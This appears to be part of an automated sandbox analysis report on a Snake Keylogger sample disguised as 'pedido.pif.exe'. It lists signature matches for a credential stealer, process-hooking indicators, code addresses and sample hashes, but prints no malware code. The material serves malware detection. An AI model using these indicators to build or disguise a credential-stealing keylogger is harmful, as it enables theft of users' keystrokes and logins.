Source: 0.2.pedido.pif.exe.4bbe890.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.pedido.pif.exe.4bbe890.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 9.2.RePUtenbQjvc.exe.42ff288.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.RePUtenbQjvc.exe.42ff288.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.RePUtenbQjvc.exe.42ff288.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000007.00000002.3870481673.000000000041B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0000000C.00000002.3870518292.0000000000413000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000009.00000002.1563111145.0000000004293000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000009.00000002.1563111145.0000000004293000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.1496016243.0000000004A23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1496016243.0000000004A23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: pedido.pif.exe PID: 3508, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: pedido.pif.exe PID: 3508, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: pedido.pif.exe PID: 5188, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: RePUtenbQjvc.exe PID: 6768, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RePUtenbQjvc.exe PID: 6768, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: RePUtenbQjvc.exe PID: 5040, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\Desktop\pedido.pif.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 0_2_07521674 NtQueryInformationProcess,	0_2_07521674
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 0_2_075256B0 NtQueryInformationProcess,	0_2_075256B0
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 9_2_06D71674 NtQueryInformationProcess,	9_2_06D71674
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 9_2_06D756B0 NtQueryInformationProcess,	9_2_06D756B0

Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 0_2_012FD684	0_2_012FD684
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 0_2_05A7C750	0_2_05A7C750
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 0_2_07521720	0_2_07521720
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 0_2_07529158	0_2_07529158
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 0_2_07522A01	0_2_07522A01
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 0_2_07524690	0_2_07524690
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 0_2_075293D9	0_2_075293D9
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 0_2_075293E8	0_2_075293E8
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 0_2_07529149	0_2_07529149
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 0_2_075281D7	0_2_075281D7
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 0_2_075281E8	0_2_075281E8
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 0_2_07524F88	0_2_07524F88
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 0_2_07524AC8	0_2_07524AC8
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 0_2_0752F90F	0_2_0752F90F
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 0_2_07525838	0_2_07525838
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 0_2_0D6A79D0	0_2_0D6A79D0
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 0_2_0D6A147A	0_2_0D6A147A
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 0_2_0D6A0040	0_2_0D6A0040
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 0_2_0D6A1F58	0_2_0D6A1F58
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 0_2_0D6A1F51	0_2_0D6A1F51
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 0_2_0D6A1B20	0_2_0D6A1B20
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 0_2_0D6A16E8	0_2_0D6A16E8
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_01246108	7_2_01246108
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_0124C190	7_2_0124C190
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_0124B328	7_2_0124B328
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_0124E431	7_2_0124E431
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_0124C470	7_2_0124C470
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_01246730	7_2_01246730
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_0124F778	7_2_0124F778
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_0124C752	7_2_0124C752
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_01249858	7_2_01249858
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_0124BBB8	7_2_0124BBB8
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_0124CA32	7_2_0124CA32
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_01244AD9	7_2_01244AD9
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_0124BEB0	7_2_0124BEB0
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_01243572	7_2_01243572
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_0124B4F2	7_2_0124B4F2
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_0124D7E0	7_2_0124D7E0
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_0124D7F0	7_2_0124D7F0
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058EC580	7_2_058EC580
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058E85B0	7_2_058E85B0
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058EB8E0	7_2_058EB8E0
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058EAC48	7_2_058EAC48
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058E9FB0	7_2_058E9FB0
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058E8BC2	7_2_058E8BC2
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058ECBD0	7_2_058ECBD0
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058EBF30	7_2_058EBF30
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058EB290	7_2_058EB290
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058EEE09	7_2_058EEE09
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058EA600	7_2_058EA600
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058ED218	7_2_058ED218
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058E85A4	7_2_058E85A4
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058E55B1	7_2_058E55B1
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058E55C0	7_2_058E55C0
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058EA5F0	7_2_058EA5F0
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058E7D00	7_2_058E7D00
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058E0D39	7_2_058E0D39
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058E5133	7_2_058E5133
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058E0D48	7_2_058E0D48
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058E8148	7_2_058E8148
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058E5140	7_2_058E5140
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058E8158	7_2_058E8158
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058EC570	7_2_058EC570
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058E0488	7_2_058E0488
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058E0498	7_2_058E0498
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058E7898	7_2_058E7898
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058E78A8	7_2_058E78A8
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058EB8D0	7_2_058EB8D0
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058E08E1	7_2_058E08E1
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058E08F0	7_2_058E08F0
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058E7CF0	7_2_058E7CF0
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058E0006	7_2_058E0006
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058E743F	7_2_058E743F
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058EAC37	7_2_058EAC37
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058E2848	7_2_058E2848
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058E0040	7_2_058E0040
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058E2858	7_2_058E2858
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058E7450	7_2_058E7450
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058E9FA0	7_2_058E9FA0
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058ECBC0	7_2_058ECBC0
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058E43D8	7_2_058E43D8
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058E6FE8	7_2_058E6FE8
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058E6FF8	7_2_058E6FF8
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058E6713	7_2_058E6713
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058E6720	7_2_058E6720
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058EBF20	7_2_058EBF20
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058E3350	7_2_058E3350
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058E6B69	7_2_058E6B69
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058E3360	7_2_058E3360
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058E6B78	7_2_058E6B78
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058EB281	7_2_058EB281
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058E62B8	7_2_058E62B8
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058E62C8	7_2_058E62C8
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058E36D8	7_2_058E36D8
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058ED20A	7_2_058ED20A
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058E5A08	7_2_058E5A08
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058E5A18	7_2_058E5A18
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058E5E60	7_2_058E5E60
Source: C:\Users\user\Desktop\pedido.pif.exe	Code function: 7_2_058E5E70	7_2_058E5E70
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 9_2_00E9D684	9_2_00E9D684
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 9_2_02826B28	9_2_02826B28
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 9_2_02820007	9_2_02820007
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 9_2_02820040	9_2_02820040
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 9_2_028216E8	9_2_028216E8
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 9_2_02821B20	9_2_02821B20
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 9_2_02821F50	9_2_02821F50
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 9_2_02821F58	9_2_02821F58
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 9_2_02823C29	9_2_02823C29
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 9_2_06D71720	9_2_06D71720
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 9_2_06D79158	9_2_06D79158
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 9_2_06D7CD51	9_2_06D7CD51
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 9_2_06D729F1	9_2_06D729F1
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 9_2_06D74690	9_2_06D74690
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 9_2_06D793E8	9_2_06D793E8
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 9_2_06D781D7	9_2_06D781D7
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 9_2_06D781E8	9_2_06D781E8
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 9_2_06D74F88	9_2_06D74F88
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 9_2_06D74AC8	9_2_06D74AC8
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 9_2_06D74ABA	9_2_06D74ABA
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 9_2_06D7FA68	9_2_06D7FA68
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 9_2_06D72A01	9_2_06D72A01
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 9_2_06D75838	9_2_06D75838
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_0293B328	12_2_0293B328
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_0293C190	12_2_0293C190
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_02936108	12_2_02936108
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_02936730	12_2_02936730
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_0293C751	12_2_0293C751
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_0293F778	12_2_0293F778
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_0293E431	12_2_0293E431
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_0293C470	12_2_0293C470
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_02934AD9	12_2_02934AD9
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_0293CA31	12_2_0293CA31
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_02939858	12_2_02939858
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_0293BEB0	12_2_0293BEB0
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_0293D7F0	12_2_0293D7F0
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_0293D7E0	12_2_0293D7E0
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_0293B4F2	12_2_0293B4F2
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_02933570	12_2_02933570
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_0673A600	12_2_0673A600
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_0673BF30	12_2_0673BF30
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_06739FB0	12_2_06739FB0
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_0673AC48	12_2_0673AC48
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_06730D48	12_2_06730D48
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_067385B0	12_2_067385B0
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_0673C580	12_2_0673C580
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_0673D218	12_2_0673D218
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_0673B290	12_2_0673B290
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_06738B00	12_2_06738B00
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_0673CBD0	12_2_0673CBD0
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_0673B8E0	12_2_0673B8E0
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_06735E70	12_2_06735E70
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_06735E60	12_2_06735E60
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_0673EE0F	12_2_0673EE0F
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_067336D8	12_2_067336D8
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_06736720	12_2_06736720
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_0673BF20	12_2_0673BF20
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_06736713	12_2_06736713
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_06736FF8	12_2_06736FF8
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_06739FA0	12_2_06739FA0
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_06737450	12_2_06737450
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_0673AC38	12_2_0673AC38
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_0673743F	12_2_0673743F
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_06737CF0	12_2_06737CF0
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_06730498	12_2_06730498
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_06730488	12_2_06730488
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_0673C570	12_2_0673C570
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_06730D39	12_2_06730D39
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_06737D00	12_2_06737D00
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_0673A5F0	12_2_0673A5F0
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_067355C0	12_2_067355C0
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_067355B3	12_2_067355B3
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_067385A0	12_2_067385A0
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_06735A18	12_2_06735A18
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_0673D20B	12_2_0673D20B
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_06735A08	12_2_06735A08
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_067362C8	12_2_067362C8
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_067362BB	12_2_067362BB
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_0673B281	12_2_0673B281
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_06736B78	12_2_06736B78
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_06733360	12_2_06733360
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_06736B69	12_2_06736B69
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_06733350	12_2_06733350
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_067343D8	12_2_067343D8
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_0673CBC0	12_2_0673CBC0
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_06732858	12_2_06732858
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_06730040	12_2_06730040
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_06732848	12_2_06732848
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_0673003D	12_2_0673003D
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_067308F0	12_2_067308F0
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_067308E1	12_2_067308E1
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_0673B8D0	12_2_0673B8D0
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_067378A8	12_2_067378A8
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_06737898	12_2_06737898
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_06738158	12_2_06738158
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_06735140	12_2_06735140
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_06738148	12_2_06738148
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_06735133	12_2_06735133
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Code function: 12_2_0673EB0B	12_2_0673EB0B

Source: pedido.pif.exe, 00000000.00000002.1500898966.000000000A620000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs pedido.pif.exe
Source: pedido.pif.exe, 00000000.00000002.1494745105.00000000031AB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs pedido.pif.exe
Source: pedido.pif.exe, 00000000.00000002.1493867373.000000000135E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs pedido.pif.exe
Source: pedido.pif.exe, 00000000.00000000.1419297252.0000000000CB8000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameAAjd.exe6 vs pedido.pif.exe
Source: pedido.pif.exe, 00000000.00000002.1496016243.0000000004A23000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs pedido.pif.exe
Source: pedido.pif.exe, 00000000.00000002.1496016243.0000000004A23000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs pedido.pif.exe
Source: pedido.pif.exe, 00000000.00000002.1494745105.00000000033D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs pedido.pif.exe
Source: pedido.pif.exe, 00000007.00000002.3870481673.0000000000420000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs pedido.pif.exe
Source: pedido.pif.exe, 00000007.00000002.3873589592.0000000000F38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs pedido.pif.exe
Source: pedido.pif.exe, 00000007.00000002.3871318695.0000000000D57000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs pedido.pif.exe
Source: pedido.pif.exe	Binary or memory string: OriginalFilenameAAjd.exe6 vs pedido.pif.exe

Source: pedido.pif.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 7.2.pedido.pif.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.pedido.pif.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 9.2.RePUtenbQjvc.exe.431fca8.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.RePUtenbQjvc.exe.431fca8.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RePUtenbQjvc.exe.431fca8.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.RePUtenbQjvc.exe.431fca8.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 9.2.RePUtenbQjvc.exe.42ff288.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.RePUtenbQjvc.exe.42ff288.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
